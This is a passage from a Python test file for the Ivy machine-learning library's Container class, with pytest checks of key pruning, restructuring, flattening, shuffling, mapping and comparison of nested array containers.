'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_pruned = container.prune_keys(['a', 'c'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
def _test_bd_exception(container_in):
try:
_ = container_in.b.d
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_keys(['a', 'd'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.c), np.array([[2]]))
assert 'd' not in container_pruned['b']
assert _test_a_exception(container_pruned)
assert _test_bd_exception(container_pruned)
def test_container_prune_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': None}}
container = Container(dict_in)
container_pruned = container.prune_key_chain('b/c')
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert (container_pruned['b']['d'] is None)
assert (container_pruned.b.d is None)
assert ('c' not in container_pruned['b'].keys())
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
container_pruned = container.prune_key_chain('b')
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert ('b' not in container_pruned.keys())
def _test_exception(container_in):
try:
_ = container_in.b
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_chains(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_pruned = container.prune_key_chains(['a', 'b/c'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_key_chains(Container({'a': True, 'b': {'c': True}}))
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
def test_container_format_key_chains(dev, call):
dict_in = {'_a': ivy.array([1], dev=dev),
'b ': {'c': ivy.array([2], dev=dev), 'd-': ivy.array([3], dev=dev)}}
cont = Container(dict_in)
cont_formatted = cont.format_key_chains(lambda s: s.replace('_', '').replace(' ', '').replace('-', ''))
assert np.allclose(ivy.to_numpy(cont_formatted['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted.a), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.d), np.array([3]))
def test_container_sort_by_key(dev, call):
dict_in = {'b': ivy.array([1], dev=dev),
'a': {'d': ivy.array([2], dev=dev), 'c': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_sorted = container.sort_by_key()
for k, k_true in zip(container_sorted.keys(), ['a', 'b']):
assert k == k_true
for k, k_true in zip(container_sorted.a.keys(), ['c', 'd']):
assert k == k_true
def test_container_prune_empty(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': {}, 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_pruned = container.prune_empty()
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert ('c' not in container_pruned['b'])
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_from_key_chains(dev, call):
container = Container({'Ayy': ivy.array([1], dev=dev),
'Bee': {'Cee': ivy.array([2], dev=dev), 'Dee': ivy.array([3], dev=dev)},
'Beh': {'Ceh': ivy.array([4], dev=dev), 'Deh': ivy.array([5], dev=dev)}})
# absolute
container_pruned = container.prune_key_from_key_chains('Bee')
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert ('Bee' not in container_pruned)
# containing
container_pruned = container.prune_key_from_key_chains(containing='B')
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Ceh']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ceh), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned['Deh']), np.array([[5]]))
assert np.allclose(ivy.to_numpy(container_pruned.Deh), np.array([[5]]))
assert ('Bee' not in container_pruned)
assert ('Beh' not in container_pruned)
def test_container_prune_keys_from_key_chains(dev, call):
container = Container({'Ayy': ivy.array([1], dev=dev),
'Bee': {'Cee': ivy.array([2], dev=dev), 'Dee': ivy.array([3], dev=dev)},
'Eee': {'Fff': ivy.array([4], dev=dev)}})
# absolute
container_pruned = container.prune_keys_from_key_chains(['Bee', 'Eee'])
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Fff']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert ('Bee' not in container_pruned)
assert ('Eee' not in container_pruned)
# containing
container_pruned = container.prune_keys_from_key_chains(containing=['B', 'E'])
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Fff']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert ('Bee' not in container_pruned)
assert ('Eee' not in container_pruned)
def test_container_restructure_key_chains(dev, call):
# single
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_restructured = container.restructure_key_chains({'a': 'A'})
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured['b/c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured['b/d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.d), np.array([[3]]))
# full
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_restructured = container.restructure_key_chains({'a': 'A', 'b/c': 'B/C', 'b/d': 'B/D'})
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/C']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/D']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3]]))
def test_container_restructure(dev, call):
container = Container({'a': ivy.array([[1, 2], [3, 4]], dev=dev),
'b': {'c': ivy.array([[2, 4], [6, 8]], dev=dev),
'd': ivy.array([3, 6, 9, 12], dev=dev)}})
container_restructured = container.restructure({'a': {'key_chain': 'A', 'pattern': 'a b -> b a'},
'b/c': {'key_chain': 'B/C', 'pattern': 'a b -> (a b)'},
'b/d': {'key_chain': 'B/D', 'pattern': '(a b) -> a b',
'axes_lengths': {'a': 2, 'b': 2}}}, keep_orig=False)
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1, 3], [2, 4]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/C']), np.array([2, 4, 6, 8]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
assert np.allclose(ivy.to_numpy(container_restructured['B/D']), np.array([[ 3, 6], [ 9, 12]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[ 3, 6], [ 9, 12]]))
def test_container_flatten_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': ivy.array([2], dev=dev)},
'e': {'f': {'g': ivy.array([3], dev=dev)}}}})
# full
container_flat = container.flatten_key_chains()
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b__c__d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b__e__f__g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f__g), np.array([[3]]))
# above height 1
container_flat = container.flatten_key_chains(above_height=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b__c']['d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b__e__f']['g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f.g), np.array([[3]]))
# below depth 1
container_flat = container.flatten_key_chains(below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['c__d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['e__f__g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f__g), np.array([[3]]))
# above height 1, below depth 1
container_flat = container.flatten_key_chains(above_height=1, below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['c']['d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['e__f']['g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f.g), np.array([[3]]))
def test_container_deep_copy(dev, call):
dict_in = {'a': ivy.array([0.], dev=dev),
'b': {'c': ivy.array([1.], dev=dev), 'd': ivy.array([2.], dev=dev)}}
cont = Container(dict_in)
cont_deepcopy = cont.deep_copy()
assert np.allclose(ivy.to_numpy(cont.a), ivy.to_numpy(cont_deepcopy.a))
assert np.allclose(ivy.to_numpy(cont.b.c), ivy.to_numpy(cont_deepcopy.b.c))
assert np.allclose(ivy.to_numpy(cont.b.d), ivy.to_numpy(cont_deepcopy.b.d))
assert id(cont.a) != id(cont_deepcopy.a)
assert id(cont.b.c) != id(cont_deepcopy.b.c)
assert id(cont.b.d) != id(cont_deepcopy.b.d)
def test_container_contains(dev, call):
arr0 = ivy.array([0.], dev=dev)
arr1 = ivy.array([1.], dev=dev)
arr2 = ivy.array([2.], dev=dev)
sub_cont = Container({'c': arr1, 'd': arr2})
container = Container({'a': arr0, 'b': sub_cont})
# keys
assert 'a' in container
assert 'b' in container
assert 'c' not in container
assert 'b/c' in container
assert 'd' not in container
assert 'b/d' in container
# sub-container
assert container.contains_sub_container(container)
assert container.contains_sub_container(sub_cont)
assert sub_cont in container
# partial sub-container
partial_sub_cont = Container({'b': {'d': arr2}})
assert container.contains_sub_container(container, partial=True)
assert container.contains_sub_container(partial_sub_cont, partial=True)
assert not partial_sub_cont.contains_sub_container(container, partial=True)
# sub-structure
sub_struc = Container({'c': ivy.array([3.], dev=dev), 'd': ivy.array([4.], dev=dev)})
assert not container.contains_sub_container(sub_struc)
assert sub_struc not in container
assert container.contains_sub_structure(sub_struc)
assert container.contains_sub_structure(container)
# partial sub-structure
partial_sub_struc = Container({'b': {'d': ivy.array([4.], dev=dev)}})
assert container.contains_sub_structure(container, partial=True)
assert container.contains_sub_structure(partial_sub_struc, partial=True)
assert not partial_sub_struc.contains_sub_structure(container, partial=True)
def test_container_shuffle(dev, call):
if call is helpers.tf_graph_call:
# tf.random.set_seed is not compiled. The shuffle is then not aligned between container items.
pytest.skip()
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': {'c': ivy.array([1, 2, 3], dev=dev), 'd': ivy.array([1, 2, 3], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_shuffled = container.shuffle(0)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
# with key_chains to apply
container_shuffled = container.shuffle(0, ['a', 'b/c'])
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to apply pruned
container_shuffled = container.shuffle(0, ['a', 'b/c'], prune_unapplied=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert 'b/d' not in container_shuffled
# with key_chains to not apply pruned
container_shuffled = container.shuffle(0, Container({'a': None, 'b': {'d': None}}), to_apply=False)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to not apply pruned
container_shuffled = container.shuffle(0, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert 'a' not in container_shuffled
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert 'b/d' not in container_shuffled
# map sequences
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': [ivy.array([1, 2, 3], dev=dev), ivy.array([1, 2, 3], dev=dev)]}
container = Container(dict_in)
container_shuffled = container.shuffle(0, map_sequences=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b'][0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b'][1]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator(include_empty=include_empty)
for (key_chain, value), expected in zip(container_iterator, [('a', a_val), ('b/c', bc_val), ('b/d', bd_val)]):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
# with leaf keys
container_iterator = container.to_iterator(leaf_keys_only=True, include_empty=include_empty)
for (key_chain, value), expected in zip(container_iterator, [('a', a_val), ('c', bc_val), ('d', bd_val)]):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator_values(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_values(include_empty=include_empty)
for value, expected_value in zip(container_iterator, [a_val, bc_val, bd_val]):
assert value is expected_value
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_keys(include_empty=include_empty)
for key_chain, expected_key_chain in zip(container_iterator, ['a', 'b/c', 'b/d']):
assert key_chain == expected_key_chain
# with leaf keys
container_iterator = container.to_iterator_keys(leaf_keys_only=True, include_empty=include_empty)
for key, expected_key in zip(container_iterator, ['a', 'c', 'd']):
assert key == expected_key
def test_container_to_flat_list(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_flat_list = container.to_flat_list()
for value, expected_value in zip(container_flat_list,
[ivy.array([1], dev=dev), ivy.array([2], dev=dev),
ivy.array([3], dev=dev)]):
assert value == expected_value
def test_container_from_flat_list(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
flat_list = [4, 5, 6]
container = container.from_flat_list(flat_list)
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_map(inplace, dev, call):
# without key_chains specification
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
if inplace:
container_iterator = container.to_iterator()
else:
container_iterator = container_mapped.to_iterator()
for (key, value), expected_value in zip(container_iterator,
[ivy.array([2], dev=dev), ivy.array([3], dev=dev),
ivy.array([4], dev=dev)]):
assert call(lambda x: x, value) == call(lambda x: x, expected_value)
# with key_chains to apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ['a', 'b/c'], inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ['a', 'b/c'], prune_unapplied=True, inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert 'b/d' not in container_mapped
# with key_chains to not apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to not apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True, inplace=inplace)
if inplace:
container_mapped = container
if not inplace:
assert 'a' not in container_mapped
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert 'b/d' not in container_mapped
# with sequences
container_orig = Container({'a': ivy.array([1], dev=dev),
'b': [ivy.array([2], dev=dev), ivy.array([3], dev=dev)]})
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace, map_sequences=True)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container_mapped['b'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_mapped['b'][1]), np.array([4]))
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_map_conts(inplace, dev, call):
# without key_chains specification
container_orig = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
def _add_e_attr(cont_in):
cont_in.e = ivy.array([4], dev=dev)
return cont_in
# with self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
if inplace:
container_mapped = container
assert 'e' in container_mapped
assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
assert 'e' in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
# without self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace)
if inplace:
container_mapped = container
assert 'e' not in container_mapped
assert 'e' in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
def test_container_multi_map(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container1 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)}})
# with key_chains to apply
container_mapped = ivy.Container.multi_map(lambda x, _: x[0] + x[1], [container0, container1])
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[8]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[8]]))
def test_container_common_key_chains(dev, call):
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
cont0 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
cont1 = Container({'b': {'c': arr2, 'd': arr3, 'e': arr1}})
cont2 = Container({'a': arr1, 'b': {'d': arr3, 'e': arr1}})
# 0
common_kcs = Container.common_key_chains([cont0])
assert len(common_kcs) == 3
assert 'a' in common_kcs
assert 'b/c' in common_kcs
assert 'b/d' in common_kcs
# 0-1
common_kcs = Container.common_key_chains([cont0, cont1])
assert len(common_kcs) == 2
assert 'b/c' in common_kcs
assert 'b/d' in common_kcs
# 0-2
common_kcs = Container.common_key_chains([cont0, cont2])
assert len(common_kcs) == 2
assert 'a' in common_kcs
assert 'b/d' in common_kcs
# 1-2
common_kcs = Container.common_key_chains([cont1, cont2])
assert len(common_kcs) == 2
assert 'b/d' in common_kcs
assert 'b/e' in common_kcs
# all
common_kcs = Container.common_key_chains([cont0, cont1, cont2])
assert len(common_kcs) == 1
assert 'b/d' in common_kcs
def test_container_identical(dev, call):
# without key_chains specification
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
container0 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
container1 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
container2 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container3 = Container({'b': {'d': arr3}})
container4 = Container({'d': arr3})
# the same
assert ivy.Container.identical([container0, container1])
assert ivy.Container.identical([container1, container0])
# not the same
assert not ivy.Container.identical([container0, container2])
assert not ivy.Container.identical([container2, container0])
assert not ivy.Container.identical([container1, container2])
assert not ivy.Container.identical([container2, container1])
# partial
assert ivy.Container.identical([container0, container3], partial=True)
assert ivy.Container.identical([container3, container0], partial=True)
assert not ivy.Container.identical([container0, container4], partial=True)
assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container1 = Container({'a': ivy.array([3], dev=dev),
